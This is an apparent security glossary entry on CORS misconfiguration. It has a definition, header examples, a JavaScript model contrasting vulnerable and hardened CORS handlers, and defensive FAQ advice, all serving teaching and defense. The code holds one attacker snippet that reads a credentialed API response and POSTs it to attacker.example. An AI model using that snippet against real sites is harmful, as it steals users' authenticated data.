CORS Misconfiguration
What is CORS Misconfiguration?
An insecure CORS policy that allows untrusted origins to read authenticated responses, often by reflecting the Origin header and returning Access-Control-Allow-Credentials: true.
CORS misconfiguration occurs when a server implements Cross-Origin Resource Sharing in a way that effectively disables the same-origin policy for its own responses. Common mistakes include reflecting any request Origin in Access-Control-Allow-Origin, allowing the 'null' origin, matching origins with loose patterns (any subdomain of a domain, or a prefix or suffix check that an attacker-registered name can satisfy), or combining Access-Control-Allow-Origin: * with Access-Control-Allow-Credentials: true (browsers reject that combination, so it is usually "fixed" by reflecting the Origin, which is worse). An attacker hosts a page that makes the victim's browser issue a credentialed cross-origin request; because the response is now readable by the attacker's script, sensitive data such as account details, API keys, anti-CSRF tokens, or other API responses can be exfiltrated. The attack depends on the browser attaching the victim's credentials, so it is most dangerous where sessions use cookies with SameSite=None or other ambient credentials. Defenses include comparing the Origin against a strict, exact-match allow-list, never reflecting or allowing null, returning Access-Control-Allow-Credentials: true only for allow-listed origins, and sending Vary: Origin so caches do not serve one origin's CORS headers to another.
● Examples
- 01
Server returns Access-Control-Allow-Origin: https://attacker.com together with Access-Control-Allow-Credentials: true whenever the request carries Origin: https://attacker.com, i.e. it reflects any Origin value it receives.
- 02
API returns Access-Control-Allow-Origin: null; an attacker can satisfy this from a sandboxed iframe (or any page with an opaque origin, such as a data: URL), which the browser sends as Origin: null.
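The explanation and the two examples above can be modelled in a few lines. The following is an added example, not code from the original page: a vulnerable server-side CORS decision that reflects the Origin, a hardened exact-match version, and a simplified model of the browser's check for a credentialed simple request. The function names (vulnerableCors, hardenedCors, browserCanRead, runScenarios), the allow-list, and the origins used are assumptions made for this illustration.

```javascript
// Added example (not part of the original page). Function names, the
// allow-list and the origins below are assumptions for illustration only.

// Constructed allow-list used by the hardened handler.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

// Vulnerable handler: reflects whatever Origin the client sent and also
// grants credentials. Any site, including a sandboxed iframe with the
// opaque origin "null", can make the victim's browser send an
// authenticated request and read the response.
function vulnerableCors(requestOrigin) {
  if (requestOrigin === undefined) return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened handler: exact-match allow-list (no reflection, no "null",
// no suffix or regex matching), credentials only for allow-listed
// origins, and Vary: Origin so caches never serve one origin's CORS
// headers to another.
function hardenedCors(requestOrigin) {
  if (requestOrigin === undefined || !ALLOWED_ORIGINS.has(requestOrigin)) {
    // Unknown origin: emit no CORS headers at all; the browser blocks the read.
    return { Vary: "Origin" };
  }
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
    Vary: "Origin",
  };
}

// Simplified model of the browser-side check for a simple (non-preflighted)
// request. Returns true if script running at pageOrigin may read the body.
function browserCanRead(headers, pageOrigin, withCredentials) {
  const acao = headers["Access-Control-Allow-Origin"];
  const acac = headers["Access-Control-Allow-Credentials"];
  if (acao === undefined) return false;
  if (withCredentials) {
    // Credentialed responses may not use the wildcard, and
    // Access-Control-Allow-Credentials must be exactly "true".
    if (acao === "*") return false;
    if (acac !== "true") return false;
  }
  return acao === "*" || acao === pageOrigin;
}

// Constructed scenarios: an attacker-controlled page, a sandboxed iframe
// (sent as Origin: null), and a legitimate first-party page, each making
// a credentialed request. Returns { origin: canRead } for the given handler.
function runScenarios(corsHandler) {
  const results = {};
  for (const origin of ["https://attacker.example", "null", "https://app.example.com"]) {
    const headers = corsHandler(origin);
    results[origin] = browserCanRead(headers, origin, true);
  }
  return results;
}

// The "wildcard plus credentials" combination the page mentions: the
// browser rejects it, so it is neither exploitable nor usable.
function wildcardWithCredentials() {
  const headers = {
    "Access-Control-Allow-Origin": "*",
    "Access-Control-Allow-Credentials": "true",
  };
  return browserCanRead(headers, "https://app.example.com", true);
}

// What the attacker's page would run against the vulnerable handler;
// kept as a string because it only does anything inside a victim's browser.
const ATTACKER_PAGE_SNIPPET = `
fetch("https://api.example.com/account", { credentials: "include" })
  .then(r => r.text())
  .then(body => fetch("https://attacker.example/log", { method: "POST", body }));
`;

console.log("vulnerable handler:", runScenarios(vulnerableCors));
console.log("hardened handler:", runScenarios(hardenedCors));
console.log("wildcard + credentials readable:", wildcardWithCredentials());
```

Against the vulnerable handler every origin, including null, can read the credentialed response; against the hardened handler only the allow-listed first-party origin can, and the wildcard-with-credentials variant is refused by the browser model. The same probe can be run against a real endpoint by sending requests with a forged Origin header and checking whether it is echoed back alongside Access-Control-Allow-Credentials: true.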
● Frequently asked questions
What is CORS Misconfiguration?
An insecure CORS policy that allows untrusted origins to read authenticated responses, often by reflecting the Origin header and returning Access-Control-Allow-Credentials: true. It belongs to the Attacks & Threats category of cybersecurity.
What does CORS Misconfiguration mean?
An insecure CORS policy that allows untrusted origins to read authenticated responses, often by reflecting the Origin header and returning Access-Control-Allow-Credentials: true.
How does CORS Misconfiguration work?
CORS misconfiguration occurs when a server implements Cross-Origin Resource Sharing in a way that effectively disables the same-origin policy for its own responses. Common mistakes include reflecting any request Origin in Access-Control-Allow-Origin, allowing the 'null' origin, matching origins with loose patterns (any subdomain of a domain, or a prefix or suffix check that an attacker-registered name can satisfy), or combining Access-Control-Allow-Origin: * with Access-Control-Allow-Credentials: true (browsers reject that combination, so it is usually "fixed" by reflecting the Origin, which is worse). An attacker hosts a page that makes the victim's browser issue a credentialed cross-origin request; because the response is now readable by the attacker's script, sensitive data such as account details, API keys, anti-CSRF tokens, or other API responses can be exfiltrated. The attack depends on the browser attaching the victim's credentials, so it is most dangerous where sessions use cookies with SameSite=None or other ambient credentials. Defenses include comparing the Origin against a strict, exact-match allow-list, never reflecting or allowing null, returning Access-Control-Allow-Credentials: true only for allow-listed origins, and sending Vary: Origin so caches do not serve one origin's CORS headers to another.
How do you defend against CORS Misconfiguration?
Compare the request's Origin header against an explicit, exact-match allow-list of full origins (scheme, host and port); never reflect the Origin, never match by suffix, prefix or regex, and never allow the null origin. Return Access-Control-Allow-Credentials: true only for allow-listed origins, omit CORS headers entirely for everything else, and send Vary: Origin whenever the response headers depend on the request. Mark session cookies SameSite=Lax or Strict where the application allows it, so that a future CORS mistake cannot be exploited with the victim's cookies. Verify the policy by sending requests with forged Origin values (an arbitrary domain, null, and a subdomain of the site) and confirming none of them is echoed back with credentials allowed.
What are other names for CORS Misconfiguration?
Common alternative names include: Permissive CORS.
● Related terms
- appsec№ 223
CORS (Cross-Origin Resource Sharing)
A browser-enforced mechanism that lets a server selectively relax the Same-Origin Policy so that JavaScript on one origin can read responses from another.
- appsec№ 960
Same-Origin Policy (SOP)
Browser security rule that restricts how a document or script loaded from one origin can interact with a resource from a different origin.
- attacks№ 240
Cross-Site Scripting (XSS)
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- attacks№ 239
Cross-Site Request Forgery (CSRF)
A web attack that forces an authenticated user's browser to send unwanted requests to a vulnerable site, causing state-changing actions without consent.
- appsec№ 961
SameSite Cookie
A cookie attribute that controls whether browsers attach the cookie on cross-site requests, with values Strict, Lax and None, used primarily to mitigate CSRF.
- attacks№ 1016
Session Hijacking
An attack that takes over a victim's authenticated session by stealing or forging the session identifier so the attacker can act as the user without their credentials.
● See also
- № 566 JSONP Vulnerability